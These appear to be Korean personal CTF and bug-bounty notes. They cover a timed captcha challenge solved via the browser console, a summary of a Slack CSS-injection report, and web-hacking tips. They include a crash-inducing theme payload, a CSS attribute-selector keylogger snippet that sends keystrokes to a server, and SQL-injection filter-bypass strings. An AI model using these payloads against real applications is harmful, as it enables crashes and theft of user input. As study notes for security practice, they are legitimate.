2초안에 nickname comment captcha를 입력하고 submit하면 되는 간단한 문제인 것 같다.

손으로 해본 결과 Too Slow라고 뜨고 3초뒤 refresh된다.

Submit을 눌렀을 때 ck()라는 함수가 실행이 되는 것을 소스코드를 통해 알게 되었다. 각 필드의 값이 공백인지 확인하고,

captcha의 경우 동일한 값을 가지는지 체크를 한다.

그러면 각 필드의 값을 채워주고, .submit()을 해주면 문제가 풀릴 것이다. 위의 코드를 콘솔에 쳐서 실행시켜 보았다.

해-결

• 대상 : Slack
• 취약점 : Improper Input Validation, css injection
• 위험도 : Medium (4.3)
• 바운티 : 500$
• 링크 : https://hackerone.com/reports/679969

Slack Mac OS v4.0.2에서 테스팅 하였습니다.

1. 설정 -> 테마 -> 사이드 바
2. 커스텀 테마 설정
3. column BG 를 #FFFFFF;} html {display:none;} 로 변경
4. 앱이 터짐

input[type="text"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

커스텀 테마 형식으로 배포된다면 해당 코드가 삽입되어 키로거로 활용될 수 있음.

1.

python3 arjun.py -u [http://some.url](https://imgxweb.rootersctf.in/) --get

- url에 파라미터가 어떤 것이 있는지 알려줌 스캔은 보통 30초정도 걸리고 휴리스틱인 파라미터를 찾아주는듯

2.

JWT가 보이면 키를 찾아보자.

john the ripper 로 key를 찾는게 가능할수도

3.

robots.txt에서 문제에 대한 힌트를 찾을 수도 있다.

4.

PHP Object Injection이라는게 있다고 한다.

s:4 s:5 어쩌구 그거다

5.

sqlinjection 

adadminmin

%23

urldecode 두번되는 경우

6.

SSI

https://github.com/lavish/ctf-writeups/tree/master/hacklu2019-TreesForFuture